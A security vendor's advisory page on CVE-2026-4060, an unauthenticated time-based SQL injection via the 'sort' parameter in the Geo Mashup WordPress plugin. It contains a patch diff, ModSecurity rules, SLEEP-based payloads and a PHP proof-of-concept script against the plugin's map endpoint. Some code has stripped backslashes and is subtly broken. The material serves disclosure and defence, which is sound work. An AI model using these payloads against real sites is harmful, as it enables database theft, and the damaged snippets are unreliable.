What is CVE-2026-4060?

CVE-2026-4060 is a high-severity vulnerability in the Geo Mashup plugin for WordPress, which allows unauthenticated SQL injection via the ‘sort’ parameter. This vulnerability arises from insufficient escaping of user input in SQL queries, enabling attackers to manipulate database queries.

How does the SQL injection work?

The vulnerability allows attackers to inject malicious SQL code into the database query by manipulating the ‘sort’ parameter. Since the input is not properly sanitized in certain code paths, attackers can execute time-based blind SQL injection, potentially extracting sensitive information from the database.

Who is affected by this vulnerability?

Any WordPress site using Geo Mashup versions up to and including 1.13.18 is affected. Administrators can check their plugin version in the WordPress admin dashboard under the Plugins section.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the installed version of the Geo Mashup plugin. If it is 1.13.18 or earlier, your site is at risk. Additionally, testing for the vulnerability can be done using the provided proof of concept.

How can I fix this vulnerability?

The vulnerability is patched in Geo Mashup version 1.13.19. Updating the plugin to this version or later will mitigate the issue. Always ensure that your plugins are kept up to date to avoid vulnerabilities.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Geo Mashup plugin until a secure version can be installed. Additionally, review your site’s access controls to limit exposure to unauthenticated users.

What does a CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity vulnerability, meaning it poses a significant risk to the affected systems. Exploitation could lead to unauthorized access to sensitive data, making it critical to address promptly.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability could allow attackers to extract sensitive information such as user credentials from the database. In some cases, it may also lead to denial of service or remote code execution, depending on the database configuration.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can send a specially crafted request to the vulnerable endpoint with a malicious ‘sort’ parameter. By including SQL functions like SLEEP(), the attacker can measure response times to infer data from the database.

What should I do if I suspect my site has been exploited?

If you suspect that your site has been exploited, immediately review your logs for unusual activity, change all passwords, and consider restoring from a backup. It is also advisable to perform a security audit to assess any further damage.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, implement a web application firewall, and conduct periodic security audits. Additionally, use security plugins that monitor for vulnerabilities and provide alerts.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-4060: Geo Mashup <= 1.13.18 – Unauthenticated Time-Based SQL Injection via 'sort' Parameter (geo-mashup)

CVE ID CVE-2026-4060

Plugin geo-mashup

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.13.18

Patched Version 1.13.19

Disclosed April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4060:

This vulnerability is an unauthenticated time-based SQL injection in the Geo Mashup WordPress plugin, affecting versions up to and including 1.13.18. The vulnerability resides in the handling of the ‘sort’ parameter within the plugin’s database query logic. It carries a CVSS score of 7.5, indicating high severity. The core issue is that insufficient escaping and lack of preparation in the ORDER BY clause allow an attacker to inject malicious SQL, combined with incomplete sanitization coverage across different code paths.

The root cause lies in the ‘sort’ parameter processing in `geo-mashup/geo-mashup-db.php`. While `esc_sql()` is applied, it is ineffective for the ORDER BY context because the value is not enclosed in single quotes. This makes it possible for an attacker to break out of the intended syntax. Although the developer added a `sanitize_sort_arg()` allowlist function in version 1.13.18, it is only applied in the AJAX code path via `sanitize_query_args()` at line 1633 of `geo-mashup-db.php`. The vulnerability persists because the `render-map.php` and template tag code paths do not call this sanitization function, leaving the ‘sort’ parameter unsanitized. Other parameters like ‘object_id’ and ‘object_ids’ were also weakly escaped, as shown by the patch which replaces `esc_sql()` with prepared statements.

An attacker can exploit this by sending a crafted request to a front-end map rendering endpoint or via the WordPress AJAX API where the ‘sort’ parameter is accepted. For example, a GET request to a page that triggers the `render-map.php` code path could include `sort=ABS(SLEEP(5))` or `sort=column, (SELECT IF(1=1,SLEEP(5),1))`. The attacker does not need authentication, as these endpoints may be publicly accessible. By observing the response delay, the attacker can infer database information one character at a time, extracting sensitive data such as admin password hashes.

The patch introduces several fixes to address the SQL injection. The primary change is the addition of `sanitize_query_args()` call in the non-AJAX code path at line 1633 of `geo-mashup-db.php`. The patch also improves escaping for other parameters: it replaces raw `esc_sql()` usage with `$wpdb->prepare()` for ‘object_id’, ‘object_ids’, and ‘exclude_object_ids’ (lines 1752-1762). It also uses `array_map(‘esc_sql’, …)` for ‘map_post_type’ array. Additionally, the patch fixes a reflected XSS in `geo-mashup.php` by adding `esc_attr()` and `esc_html()` calls on template output. The options page now checks for `manage_options` capability before updating settings in `OptionsPage.php`.

Successful exploitation could lead to full database compromise. An attacker can extract usernames, password hashes, and other sensitive data. While time-based blind injection requires multiple requests, it is effective for data extraction. The ability to append to an existing query also opens possibilities for denial of service or, in some database configurations, writing files to the filesystem, potentially leading to remote code execution. Given the unauthenticated nature, this vulnerability poses a critical threat to all sites using the affected plugin version.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/geo-mashup/geo-mashup-db.php
+++ b/geo-mashup/geo-mashup-db.php
@@ -1495,6 +1495,7 @@
 	 * @param string $name
 	 */
 	public static function sanitize_query_arg( &$value, $name ) {
+		if (is_null($value)) return;
 		switch ($name) {
 			case 'minlat':
 			case 'maxlat':
@@ -1507,7 +1508,6 @@
 				$value = (float) $value;
 				break;

-			case 'map_cat':
 			case 'object_ids':
 			case 'exclude_object_ids':
 				$value = preg_replace( '/[^0-9,]/', '', $value );
@@ -1515,6 +1515,8 @@

 			case 'map_post_type':
 			case 'object_name':
+			case 'map_cat':
+			case 'show_future':
 				$value = sanitize_key( $value );
 				break;

@@ -1528,10 +1530,6 @@
 				$value = (bool) $value;
 				break;

-			case 'show_future':
-				$value = sanitize_key( $value );
-				break;
-
 			case 'sort':
 				$value = self::sanitize_sort_arg( $value );
 				break;
@@ -1635,6 +1633,7 @@
 			'map_offset' => 0,
 		);
 		$query_args = wp_parse_args( $query_args, $default_args );
+		$query_args = self::sanitize_query_args( $query_args );

 		// Construct the query
 		$object_name = $query_args['object_name'];
@@ -1745,18 +1744,23 @@
 			} else {
 				if ( !is_array( $query_args['map_post_type'] ) )
 					$query_args['map_post_type'] = preg_split( '/[,s]+/', $query_args['map_post_type'] );
-				$wheres[] = "o.post_type IN ('" . join("', '", $query_args['map_post_type']) . "')";
+				$wheres[] = "o.post_type IN ('" . join("', '", array_map( 'esc_sql', $query_args['map_post_type'] ) ) . "')";
 			}
 		}

 		if ( ! empty( $query_args['object_id'] ) ) {
-			$wheres[] = 'gmlr.object_id = ' . esc_sql( $query_args['object_id'] );
+			$wheres[] = $wpdb->prepare('gmlr.object_id = %d', absint( $query_args['object_id' ]));
 		} else if ( ! empty( $query_args['object_ids'] ) ) {
-			$wheres[] = 'gmlr.object_id IN ( ' . esc_sql( $query_args['object_ids'] ) .' )';
+			$ids = array_map( 'absint', explode( ',', $query_args['object_ids'] ) );
+    		$placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
+    		$wheres[] = $wpdb->prepare( "gmlr.object_id IN ( $placeholders )", $ids );
 		}

-		if ( ! empty( $query_args['exclude_object_ids'] ) )
-			$wheres[] = 'gmlr.object_id NOT IN ( ' . esc_sql( $query_args['exclude_object_ids'] ) . ' )';
+		if ( ! empty( $query_args['exclude_object_ids'] ) ) {
+			$ids = array_map( 'absint', explode( ',', $query_args['exclude_object_ids'] ) );
+    		$placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
+			$wheres[] = $wpdb->prepare( "gmlr.object_id NOT IN ( $placeholders )", $ids );
+		}

 		list( $l_cols, $l_join, $l_where, $l_groupby ) = $location_query->get_sql( 'o', $object_store['id_column'] );
 		$field_string .= $l_cols;
--- a/geo-mashup/geo-mashup-options.php
+++ b/geo-mashup/geo-mashup-options.php
@@ -448,7 +448,7 @@
 						__(', which must be a string', 'GeoMashup') );
 					return false;
 				}
-				if ( preg_match( "/<.*>/", $value ) ) {
+				if ( preg_match( "/</?[a-z][a-z0-9]*/i", $value ) ) {
 					array_push ( $this->validation_errors, '"'. esc_html( $value ) . '" ' . __('is invalid for', 'GeoMashup') . ' ' . $key .
 						__(', which must not contain XML tags.', 'GeoMashup') );
 					return false;
--- a/geo-mashup/geo-mashup.php
+++ b/geo-mashup/geo-mashup.php
@@ -3,7 +3,7 @@
 Plugin Name: Geo Mashup
 Plugin URI: https://wordpress.org/plugins/geo-mashup/
 Description: Save location for posts and pages, or even users and comments. Display these locations on Google, Leaflet, and OSM maps. Make WordPress into your GeoCMS.
-Version: 1.13.18
+Version: 1.13.19
 Author: Dylan Kuhn
 Text Domain: GeoMashup
 Domain Path: /lang
@@ -256,7 +256,7 @@
 		define('GEO_MASHUP_DIRECTORY', dirname( GEO_MASHUP_PLUGIN_NAME ) );
 		define('GEO_MASHUP_URL_PATH', trim( plugin_dir_url( __FILE__ ), '/' ) );
 		define('GEO_MASHUP_MAX_ZOOM', 20);
-		define('GEO_MASHUP_VERSION', '1.13.18');
+		define('GEO_MASHUP_VERSION', '1.13.19');
 		define('GEO_MASHUP_DB_VERSION', '1.3');
 	}

@@ -1113,6 +1113,9 @@
 	 */
 	private static function click_to_load_content( $map_data, $iframe_src, $click_to_load_text, $static, $map_image ) {

+		$iframe_src = esc_attr( $iframe_src );
+		$click_to_load_text = esc_html( $click_to_load_text );
+
 		if ( is_feed() ) {
 			return "<a href="{$iframe_src}">$click_to_load_text</a>";
 		}
@@ -1621,6 +1624,8 @@
 		);
 		$args = wp_parse_args( $args, $defaults );
 		extract( $args, EXTR_SKIP );
+		$separator = esc_html( $separator );
+		$format = esc_html( $format );
 		$info = '';

 		if ( $object_name && $object_id ) {
--- a/geo-mashup/geo-query.php
+++ b/geo-mashup/geo-query.php
@@ -269,7 +269,7 @@
 		header('Cache-Control: no-cache;', true);
 		header('Expires: -1;', true);

-		$json = GeoMashup::get_locations_json( GeoMashupDB::sanitize_query_args( $_REQUEST ) );
+		$json = GeoMashup::get_locations_json( $_REQUEST );
 		if ( isset( $_REQUEST['callback'] ) )
 			$json = esc_js( $_REQUEST['callback'] ) . '(' . $json . ')';
 		echo $json;
--- a/geo-mashup/php/Admin/Settings/OptionsPage.php
+++ b/geo-mashup/php/Admin/Settings/OptionsPage.php
@@ -86,6 +86,10 @@

 		check_admin_referer( 'geo-mashup-update-options' );

+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_die( 'Not Authorized' );
+		}
+
 		// Make missing array options empty
 		if ( empty( $submission['global_map']['add_map_type_control'] ) ) {
 			$submission['global_map']['add_map_type_control'] = array();
--- a/geo-mashup/php/Search.php
+++ b/geo-mashup/php/Search.php
@@ -174,19 +174,18 @@
 	public function load_template( $template = 'search-results' ) {

 		// Define variables for the template
-		/** @var $object_name */
-		/** @var $object_ids */
-		/** @var $units */
-		/** @var $location_text */
-		/** @var $radius */
-		/** @var $sort */
-		extract( $this->query_vars, EXTR_OVERWRITE );
+	 	$object_name = isset($this->query_vars['object_name']) ? $this->query_vars['object_name'] : null;
+	 	$distance_factor = isset($this->query_vars['distance_factor']) ? $this->query_vars['distance_factor'] : null;
+	 	$units = isset($this->query_vars['units']) ? $this->query_vars['units'] : null;
+	 	$location_text = isset($this->query_vars['location_text']) ? $this->query_vars['location_text'] : null;
+	 	$radius = isset($this->query_vars['radius']) ? $this->query_vars['radius'] : null;
+	 	$sort = isset($this->query_vars['sort']) ? $this->query_vars['sort'] : null;

 		extract( [
-			'search_text'       => $location_text,
+			'search_text'       => esc_html( $location_text ),
 			'distance_factor'   => $this->distance_factor,
 			'near_location'     => $this->near_location,
-			'result_count'      => $this->result_count,
+			'result_count'      => (int) $this->result_count,
 			'geo_mashup_search' => &$this,
 			'approximate_zoom'  => absint( log( 10000 / $this->max_km, 2 ) )
 		], EXTR_OVERWRITE );
--- a/geo-mashup/vendor/composer/installed.php
+++ b/geo-mashup/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'cyberhobo/wordpress-geo-mashup',
-        'pretty_version' => '1.13.18',
-        'version' => '1.13.18.0',
-        'reference' => '9305999a20b89e7ac45e070acf55cb709112103d',
+        'pretty_version' => '1.13.19',
+        'version' => '1.13.19.0',
+        'reference' => 'dc9a83950897592ee664acc7dea71600e68ea932',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'cyberhobo/wordpress-geo-mashup' => array(
-            'pretty_version' => '1.13.18',
-            'version' => '1.13.18.0',
-            'reference' => '9305999a20b89e7ac45e070acf55cb709112103d',
+            'pretty_version' => '1.13.19',
+            'version' => '1.13.19.0',
+            'reference' => 'dc9a83950897592ee664acc7dea71600e68ea932',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4060
SecRule REQUEST_URI "@rx /wp-content/plugins/geo-mashup/render-map.php$" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-4060 - Time-Based SQL Injection via sort parameter (render-map)',severity:'CRITICAL',tag:'CVE-2026-4060'"
  SecRule ARGS:sort "@rx SLEEP|BENCHMARK|WAITFOR|DELAY|PG_SLEEP|SYS_EXTRACT_UTC" "t:lowercase,t:removeNulls,chain"
    SecRule ARGS:sort "@rx (|;" "t:lowercase,t:removeNulls"

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-4060 - Time-Based SQL Injection via sort parameter (AJAX)',severity:'CRITICAL',tag:'CVE-2026-4060'"
  SecRule ARGS_POST:action "@streq geo_mashup_icon_form" "chain"
    SecRule ARGS:sort "@rx SLEEP|BENCHMARK|WAITFOR|DELAY|PG_SLEEP|SYS_EXTRACT_UTC" "t:lowercase,t:removeNulls,chain"
      SecRule ARGS:sort "@rx (|;" "t:lowercase,t:removeNulls"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4060 - Geo Mashup <= 1.13.18 - Unauthenticated Time-Based SQL Injection via 'sort' Parameter

$target_url = 'http://example.com/wp-content/plugins/geo-mashup/render-map.php'; // Adjust to actual map endpoint

// Payload: attempt to inject a SLEEP() call to confirm time-based injection
$payload = '1, (SELECT SLEEP(5))';

// Construct the request URL with the malicious sort parameter
$url = $target_url . '?sort=' . urlencode($payload);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Set a generous timeout to avoid premature failure
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$duration = $end_time - $start_time;

curl_close($ch);

// If the response took 5+ seconds, the injection likely succeeded (time-based detection)
echo "[+] Target URL: " . $url . "n";
echo "[+] Response duration: " . round($duration, 2) . " secondsn";
if ($duration >= 4.5) { // Allow some margin for network latency
    echo "[!] Vulnerability confirmed: time delay detected.n";
    echo "[*] To extract data, replace SLEEP(5) with time-based conditional queries.n";
} else {
    echo "[-] No time delay detected; target may be patched or endpoint differs.n";
}

Frequently Asked Questions

What is CVE-2026-4060?
Understanding the vulnerability
CVE-2026-4060 is a high-severity vulnerability in the Geo Mashup plugin for WordPress, which allows unauthenticated SQL injection via the ‘sort’ parameter. This vulnerability arises from insufficient escaping of user input in SQL queries, enabling attackers to manipulate database queries.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability allows attackers to inject malicious SQL code into the database query by manipulating the ‘sort’ parameter. Since the input is not properly sanitized in certain code paths, attackers can execute time-based blind SQL injection, potentially extracting sensitive information from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using Geo Mashup versions up to and including 1.13.18 is affected. Administrators can check their plugin version in the WordPress admin dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps to verify vulnerability status
To check if your site is vulnerable, verify the installed version of the Geo Mashup plugin. If it is 1.13.18 or earlier, your site is at risk. Additionally, testing for the vulnerability can be done using the provided proof of concept.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in Geo Mashup version 1.13.19. Updating the plugin to this version or later will mitigate the issue. Always ensure that your plugins are kept up to date to avoid vulnerabilities.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Geo Mashup plugin until a secure version can be installed. Additionally, review your site’s access controls to limit exposure to unauthenticated users.
What does a CVSS score of 7.5 indicate?
Understanding severity ratings
A CVSS score of 7.5 indicates a high severity vulnerability, meaning it poses a significant risk to the affected systems. Exploitation could lead to unauthorized access to sensitive data, making it critical to address promptly.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability could allow attackers to extract sensitive information such as user credentials from the database. In some cases, it may also lead to denial of service or remote code execution, depending on the database configuration.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can send a specially crafted request to the vulnerable endpoint with a malicious ‘sort’ parameter. By including SQL functions like SLEEP(), the attacker can measure response times to infer data from the database.
What should I do if I suspect my site has been exploited?
Response to potential breaches
If you suspect that your site has been exploited, immediately review your logs for unusual activity, change all passwords, and consider restoring from a backup. It is also advisable to perform a security audit to assess any further damage.
How can I prevent similar vulnerabilities in the future?
Best practices for WordPress security
To prevent similar vulnerabilities, regularly update all plugins and themes, implement a web application firewall, and conduct periodic security audits. Additionally, use security plugins that monitor for vulnerabilities and provide alerts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations